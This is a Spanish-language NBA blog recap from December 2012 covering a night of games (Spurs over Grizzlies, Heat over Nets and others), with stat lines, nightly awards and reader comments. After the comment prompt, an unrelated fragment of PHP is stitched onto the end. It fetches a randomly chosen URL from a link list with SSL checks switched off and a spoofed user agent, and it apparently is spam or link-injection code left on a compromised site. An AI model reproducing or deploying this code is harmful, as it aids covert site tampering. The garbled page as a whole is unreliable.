La Crónica: El descanso del guerrero

02 de December de 2012 por Sancho88

Esta mañana toca darle la razón al señor Greg Popovich. Él sabía que Tim Duncan dobla sus estadísticas cuando puede descansar dos noches enteras. Y así sucedió en uno de los dos grandes partidos de la madrugada. La alianza DuncanParker sigue siendo tan productiva como siempre y esta vez no iban a permitir que los líderes Grizzlies asaltaran El Álamo (95-99). Duncan anotó 27 puntos, 15 rebotes y 4 asistencias; y Parker sumó 30 puntos, 4 rebotes y 6 asistencias. Ambos por encima claramente del 50% de acierto. Ahora Stern debería quitarle la multa a estos Spurs por hacernos disfrutar al 100% de una leyenda con vida. De hecho, la multa la deberían pagar en centavos de a uno, o con billetes falsos del Monopoly. Suponemos que se le atascó el fax a Stern esta vez y no pudo mandar un comunicado durante el primer cuarto para pedir perdón a los aficionados texanos, porque ayer los Spurs descansados hicieron vibrar el ‘Saturday Night Live’ de la NBA.

Al César lo que es del César, si el jueves los criticábamos por el duelo descafeinado contra los Heat, anoche fue todo lo contrario. Superaron una prórroga contra los Grizzlies de Marc y ganaron un partido que tuvieron muy contra las cuerdas en el tercer cuarto, cuando Memphis se había ido de 15 puntos (73-58). En ese instante, los Grizzlies mutaron a su versión ‘postemporadesca’ en la que arruinan las grandes ventajas, y en los Spurs aparecieron para hacer mucho daño dos invitados de lujo: Patt Mills y Gary Neal. Cuando estos dos se calientan pueden remontar un partido, y es lo que pasó ayer. Dejaron el asunto a solo 3 puntos y Ginobili lo remató con un triple en los últimos segundos para forzar la prórroga. Luego, Tony Parker fue el amo y señor con 8 puntos, Duncan ayudó con un palmeo tras rebote ofensivo y los Grizzlies tuvieron que claudicar ante una remembranza más del mejor equipo de la pasada década.

Marc se llevó el póster a casa del gran reverso con mate posterior de Duncan que le dedicó al de Sant Boi y Randolph estuvo muy fallón (5/21) a pesar de sus 17 puntos y 15 rebotes. Aunque los números de la pareja osezna fueron bastante buenos, pues Marc sumó 20 puntos y 8 rebotes, y Gay y Conley ayudaron con sendos dobles-dobles, nada pudieron hacer para parar a Duncan y Parker. Son seres superiores sencillamente. Partido muy recomendable para mitómanos, para ver lo que hacía Tim Duncan con 36 años.

En el otro gran duelo de la noche, Miami se llevó un partido por clara superioridad en la segunda parte ante los Nets (89-102). A pesar de la salida en tromba de los ‘Redes’ de Brooklyn, que dominaron el primer cuarto (24-16) con un gran Gerald Wallace, Miami fue capaz de ajustar paulatinamente su defensa y correr al contraataque, aprovechando las 19 pérdidas de balón de los Nets. Norris Cole fue el primero que creyó en la remontada y Dwayne Wade se vistió de verdugo sumando 34 puntos y 7 asistencias con un impresionante 14/20 en tiros de campo. Fue una pesadilla constante ganando el centro de la zona con canastas imposibles. Lebron estuvo en sus números, rozando el triple-doble (21-9-6).

En Brooklyn se desinflaron en la segunda parte, en la que solo anotaron 30 puntos. Siguen echando mucho en falta a López, aunque Andray Blatche fue de nuevo el mejor del equipo con 20 puntos y 8 rebotes. Humphries no marca las diferencias, Johnson falló anoche todo lo fallable y Deron Williams sigue sin encontrar el ritmo ofensivo que a él le gusta. Está asistiendo muy bien pero sus porcentajes de tiro son muy malos, y, en general, los de su equipo lo fueron ayer. 44% en TC, 21% en triples y 19 pérdidas de balón. Avery Johnson debe aprender que no solo cuenta la defensa, y es que en ataque hay que tener mucho cuidado con equipos como los Heat que viven de robar balones y correr alegres. En cuanto esto sucedió, los Nets estuvieron muertos.

En el resto de la jornada se jugaron 8 interesantes partidos.

En Houston se vivió un apasionante partido típico de Conferencia Oeste, con muchos puntos, y los Rockets aplastaron con un gran ritmo ofensivo a los Jazz (116-124). Pattrick Patterson lideró a su equipo con 20 puntos y hasta 7 hombres terminaron en dobles figuras de anotación. Los Jazz siguen con lesiones de Favors y Marvin Williams y jugaron muy mermados en las alas. Hayward fue el mejor desde el banquillo con 21 puntos, y Jefferson y Foye sumaron 20 por cabeza.

Nicolas Batum era anoche un hombre feliz después de anotar el triple final ‘a la remanguillé’ cuando faltaban 0.2 segundos para el final de la segunda prórroga contra los Cavaliers (118-117). Él mismo había forzado esa segunda prórroga al término de la primera. Esta vez, Damian Lillard si jugó a un gran nivel rozando el triple-doble (24-6-11), y LaMarcus Aldridge aportó 21 puntos y 9 rebotes. En los ‘Cavs’ de nuevo se repartieron la anotación entre 8 jugadores por encima de los 10 puntos, destacando los 22 de Alonzo Gee. Como apunte estadístico del partido, Anderson Varejao sumó 19 puntos y 17 rebotes y lleva ya 8 partidos consecutivos haciendo doble-doble con al menos 15 rebotes y 5 de ellos ofensivos, y eso que ayer jugó con un dedo dislocado. Sus números no son normales ni mucho menos. De hecho, Moses Malone tiene el record absoluto en su etapa en los Houston Rockets 1978/1979 con 12 juegos seguidos sumando doble-doble con 15 rebotes y 5 de ellos ofensivos, así que Varejao es el segundo en toda la historia de la NBA en conseguirlo, y va muy seriamente a por el record de Moses. ¿Quién diría que aquel discutido jugador del Barça acabaría batiendo records en la NBA? Where amazing happens…

Lo más cachondo de todo el partido fue que Batum declaró al final que le había instalado a su madre que vive en Francia el League Pass aquella misma noche y que estaba feliz porque probablemente le estuviera viendo meterla desde lejos a las 4 de la mañana. Bueno, interpreten en términos baloncestísticos, que el doblaje americano-palentino, palentino-americano lo llevo regular. Lo peor del partido fue la lesión de tobillo de Waiters. Lo mejor es que han confirmado que Irving volverá a mediados de diciembre. Las gallinas que entran por las que van saliendo, como diría José Mota.

En Chicago los Bulls vencieron un partido muy complicado contra los Sixers (88-93) liderados por un gran Luol Deng, que sumó 25 puntos, 7 rebotes y 7 asistencias, y con los jugadores interiores aportando. Noah y Boozer firmaron un doble-doble cada uno, Taj Gibson estuvo genial desde el banco y R.I.P. Hamilton anotó 15 puntos. La mala noticia es que se lesionó el tobillo en el tercer cuarto y los Bulls no están para más bajas sin Rose. Veremos cómo evoluciona el veterano escolta. Los Sixers demasiado hacen jugando sin pívot desde el inicio de temporada y con Spencer Hawes rindiendo muy mal con respecto al año pasado. Holiday y Thaddeus Young fueron los mejores sumando entre los dos 45 puntos, más de la mitad de los que sumó su equipo.

Los Bucks remontaron un primer cuarto pésimo y consiguieron la victoria frente a los Celtics en el último partido de suspensión de Rondo (88-91). Debutó Mbah a Moute, el ‘frontcourt titular’ solo anotó 18 puntos (UdohDanielsHenson, Skiles busca sanción del ‘Sternato‘), mientras que Ilyasova metió 15 desde el banquillo y Sanders la volvió a liar con 18 puntos, 16 rebotes y 5 tapones también desde el banquillo. Además, Milwaukee jugó sin Udrih y Dunleavy por lesión, y esta vez los damnificados por las rotaciones fueron Dalembert y Tobías Harris, que no jugaron ni un minuto. No obstante, los Celtics pudieron empatar e incluso ganar el partido en los últimos instantes, pero Pierce no estuvo acertado y Jason Terry falló dos triples seguidos ante la atenta mirada de Pierce, que le miraba como diciendo… tú no eres Ray Allen… En estos finales apretados los Celtics tienen menos recursos ahora. El propio Pierce fue el mejor de los verdes con 19 puntos, Terry firmó un doble-doble haciendo de Rondo (15 puntos y 11 asistencias) y Jeff Green volvió a ser eficiente desde el banquillo con 18 puntos y 6 rebotes en sus 22 minutos de rigor. Doc Rivers estaba afectado al final del partido por la muerte de su entrenador asistente en Marquette en los años 80, Rick Majerus, y declaró que su diminutivo ‘Doc’ se lo había puesto el propio Majerus en la etapa universitaria del actual entrenador de los Celtics. Hay que recordar que Doc se llama en realidad Glenn Anton.

En Golden State, impresionante destrozo del ‘backourt’ de los Warriors contra Pacers (92-103). Entre Curry, Klay Thompson y Jarrett Jack anotaron 60 de los 103 puntos de los Warriors y Curry añadió 11 asistencias. Pocos esperaban ver a estos Warriors tan bien sin BogutLandry rindió muy bien desde el banquillo y Lee sumó un doble-doble, por lo que consiguieron minimizar una noche más la baja de su pívot. De hecho, nadie sabe si volverá a jugar esta temporada. Los sorprendentes Warriors ya son cuartos en el Oeste y en Indiana siguen de capa caída fuera de casa. Lo de Paul George es para hacérselo mirar. Es una gran decepción su última semana, a ver si levanta el vuelo. Solo David West y George Hill parecen estar a la altura de las circunstancias. Si no vuelve Granger pronto se quedarán sin Playoffs segurísimo.

Los Thunder se ‘zamparon’ a los Hornets sin Davis una noche más (100-79). Durant en su línea (20-8), Westbrook dando pases y demostrando que se ha vuelto generoso (18-5-10) y Kevin Martin completando el trío anotador con 19 puntos. Ibaka estuvo mal anoche y en los Hornets solo se salvó Ryan Anderson. Por fin salió de titular para meter 21 puntos y coger 10 rebotes.

En Dallas debutó Derek Fisher en la victoria contra los Pistons (77-92). Estuvo muy discreto y jugó de titular. Veremos si no le corta las alas a Collison. O.J. Mayo fue el mejor con 27 puntos y Elton Brand firmó un doble-doble desde el banquillo (17-12). Por parte de los Pistons, partido muy flojo de Greg Monroe, con 8 puntos y 15 rebotes, pero solo 4/17 en TC y Brandon Knight fue el mejor con 20 puntos.

Y para finalizar, victoria balsámica y fácil de los Clippers en el Staples frente a los desastrosos Kings (81-116). 7 hombres llegaron a las dobles figuras en el equipo de Vinny Del Negro, y Jamaal Crawford lideró la anotación con 17 puntos y 6 asistencias. Tendrá competencia con Jeff Green o J.R. Smith para el premio al 6º hombre. En los Kings Marcus Thornton firmó 20 puntos con 6/9 en triples, y Jason Thompson hizo un doble-doble con 16 puntos y 12 asistencias. No jugó Tyreke Evans por segundo partido consecutivo y la gran decepción la puso DeMarcus Cousins con 8 puntos, 6 rebotes y 3/9 en tiros de campo. Otro año más que se quedará sin el All-Star. Si fuera un poco espabilado, buscaría el traspaso. En estos Kings está tirando su carrera profesional.

PREMIOS

MVP: Anoche hubo grandísimas actuaciones individuales, y es difícil quedarse con una sola. No obstante, por impacto mediático y aclamación popular de los foreros, Tim Duncan se lleva el premio de hoy. El ala-pívot de los Spurs anotó 27 puntos con un gran 11/17 en tiros de campo, capturó 15 rebotes (6 de ellos ofensivos) y dio 4 pases de canasta para guiar a su equipo en la importante victoria contra los Grizzlies. Tony Parker también fue fundamental con 30 puntos, 4 rebotes y 6 asistencias y un 11/20 en tiros de campo. Entre los dos batieron a los líderes, eso sí, sudando la gota gorda y en la prórroga. Otras grandes actuaciones individuales de la noche fueron los 34 puntos y 7 asistencias de Dwyane Wade para ganar a los Nets; los 27 puntos, 5 rebotes y 4 asistencias de O.J. Mayo en la victoria contra los Pistons; los 20 puntos y 11 asistencias de Steph Curry para ganar a los Pacers; El 25-7-7 de Deng contra los Sixers o el 24-6-11 de Lillard frente a los Cavaliers.

Rookie: Lillard ataca de nuevo. El base de los Blazers está siendo el mejor rookie de su generación hasta el momento. Dio el pase de la canasta final de Batum y demostró la sangre fría que corre por sus venas. 24 puntos, 6 rebotes y 11 asistencias de un novato que parece mucho más mayor por su forma de jugar y su dominio en la pista. Damian Lillard es el gran robo del draft. En Porltand tienen base para muchísimo tiempo.

Sorpresa: Nos sigue sorprendiendo gratamente Larry Sanders en los Bucks. Anoche se desquitó y por fin pudo guiar a la victoria a su equipo contra los Celtics. 18 puntos, 16 rebotes y 5 tapones. No sabemos cómo lo hace pero lo hace.  Los 17 puntos y 12 rebotes de Elton Brand desde el banquillo en la victoria de los Mavs también suelen escasear en los últimos tiempos, así como los 12 puntos y 3 robos de balón de Norris Cole, que fue el detonante en la remontada de los Heat frente a los Nets.

Decepción: ¿Qué puede hacer Paul George en media hora de su vida? Definitivamente, 0 puntos con 0/7 en tiros de campo no. Pero es lo que le sucedió anoche. Decepción de las gordas también fue DeMarcus Cousins con su 8-6 de ayer y el 5/21 de Zach Randolph contra los Spurs.

Esfuerzo en vano: El premio de esta noche se va para Anderson Varejao, autor de 19 puntos, 17 rebotes, 5 asistencias y 2 robos de balón en la derrota de los Cavaliers contra los Blazers. Ryan Anderson, por su parte, se quedó también sin victoria tras su 21-10 frente a los Thunder. Los Hornets no le ganan a nadie sin Anthony Davis.

Imágenes | AP Photos / Getty Images

Comenta

12 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Sinceramente no acabo de comprender el batacazo de los Pacers esta temporada.George,que comenzó fuerte pero se ha ido diluyendo,y Hibbert el cual es como el Halley,aparece cada 76 partidos,2 de los ejemplos claros de su temporada.Aún así pueden ser los beneficiados del nivel del este y pelear por ese 8º regulero que da acceso a los PO año tras año.

      Citar

  2. HisRoyalAirness dice:
    #2

    Vengo a escribir THE BIG FUNDAMENTAL en mayúsculas y me voy.

    No sin antes añadir que su partido fue ante el mejor juego interior de la liga. Amo y señor

      Citar

  3. nba dice:
    #3

    Ahora Stern deberia comerse con patatas su sancion

      Citar

  4. Denise dice:
    #4

    nba:
    Ahora Stern deberia comerse con patatas su sancion

    Y que los jugadores y entrenadores no cobren por derechos de imagen, publicidad y sus partidos no se retransmitan por televisión con el consecuente descenso en sus nóminas y cuentas bancarias.
    Y ahora que se produzca una imitación en cascada y veamos a los cracks jugando 55 partidos al año y que haya más de 200 partidos basura por temporada.

    Veremos a ver como acaba la NBA post-Stern, será imposible que aparezca un comisionado mejor que él.

      Citar

  5. Denise dice:
    #5

    Pues otra victoria mas para los Knicks y otra expulsion más para la carrera de Ra-Shit Wallace, que no ha durado más de 2 minutos en el campo. Leñazo a Scola y protestando como un cavernicola al que le han robado un ciervo, lo que le ha costado la expulsión. El mejor del partido, Felton, anotando con buenos porcentajes, anotando al final un par de canastas consecutivas para sentenciar a los Suns y dirigiendo mejor de lo que lo hace Kidd.

    Por los Suns, temporada pésima, otra mas en la carrera de Beasley, confirmandose como uno de los mayores pufos de los últimos años en relación a su posición en el Draft. Muchos esperaban que explotase en los Suns, pero no se puede esperar mucho de un tio sin cerebro.
    Confio en Morris, me gusta bastante, al igual que Shannon Brown, pero Scola y Dudley son mejores jugadores y deberían ser titulares

      Citar

  6. HisRoyalAirness dice:
    #6

    Joder Denise, vienes calentito…

    Lo de Popovich fue como protesta al calendario. Han tenido más partidos fuera de casa que nadie, si lo analizas tiene más razón que un santo

      Citar

  7. Denise dice:
    #7

    Por cierto, la victoria de los Magic en el Staples se paga 15 a 1 mas o menos, por si alguno quiere arriesgarse…

    Primer duelo entre Howard y Orlando, supongo que tanto uno como otros estarán hipermotivados. La pena es que no jugará Nelson, una de las mayores y pocas esperanzas para que los Magic ganasen el partido ya que hubiese destrozado a ese base penoso de L.A, el tal Morris.

      Citar

  8. Denise dice:
    #8

    HisRoyalAirness:
    Joder Denise, vienes calentito…

    Lo de Popovich fue como protesta al calendario. Han tenido más partidos fuera de casa que nadie, si lo analizas tiene más razón que un santo

    Pero no se puede poner eso de moda y por costumbre. Además en un partido grande televisado a nivel nacional ante el actual campeón.
    Yo creo que si reservan a su Big 3 ante los Wizards no hubiese pasado nada. De todas formas, Popovych y los Spurs me caen mal, siempre se han caracterizado por provocadores, sucios y antideportivos.

      Citar

  9. Pop dice:
    #9

    Denise: Pero no se puede poner eso de moda y por costumbre. Además en un partido grande televisado a nivel nacional ante el actual campeón.
    Yo creo que si reservan a su Big 3 ante los Wizards no hubiese pasado nada. De todas formas, Popovych y los Spurs me caen mal, siempre se han caracterizado por provocadores, sucios y antideportivos.

    ¿Pero por qué la gente piensa que esto va a marcar una tendencia? ¿De verdad créeis que lo que ha hecho Popovich va a dar lugar a una moda en que los equipos guarden a sus estrellas la mitad de la temporada? ¿Estamos locos o qué? Les ha dado descanso después de 17 partidos, leñe, no cada 5. Es que Stern ha metido la pata: el partido contra los Heat fue un espectáculo, y el partido contra los Grizzlies también.

    Por muy mal que le pueda caer a nadie S.A., por muy feo que nos parezca quitar a 3 estrellas de golpe, por mucho que la razón escondida sea una protesta contra el calendario, Popovich estaba en su derecho y no había por qué sancionarle. Sino que cambien el reglamento o que pongan un calendario donde haya menos partidos y la gente juegue más descansado, y por lo tanto dé más espectáculo.

    Lo de que se ponga una moda en la que los equipos no usen a sus mejores jugadores en la mitad de los partidos perdona pero no se lo cree nadie.

      Citar

  10. Vader dice:
    #10

    Dios como se tira Carmelo al suelo para recuperar balones, si hasta me ha recordado a Larry Bird!!!

    Jugando con este entusiasmo Melo si que es un jugador franquicia con mayusculas. Si Woodson consigue que Stat haga lo mismo se merecerá el premio a entrenador del año.

    Saludos

      Citar

  11. Denise dice:
    #11

    ORLANDAZO!! Nelson MVP, Nelson MVP, Nelson MVP (8)

    Bueno,. ya comentaremos algo más en la crónica.

      Citar

  12. Sancho88 dice:
    #12

    JEJEJE, ahora me arrepiento de no haberle metido al 15 a 1 que decías Denise. Menudo monstruo, como lo pronosticaste…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>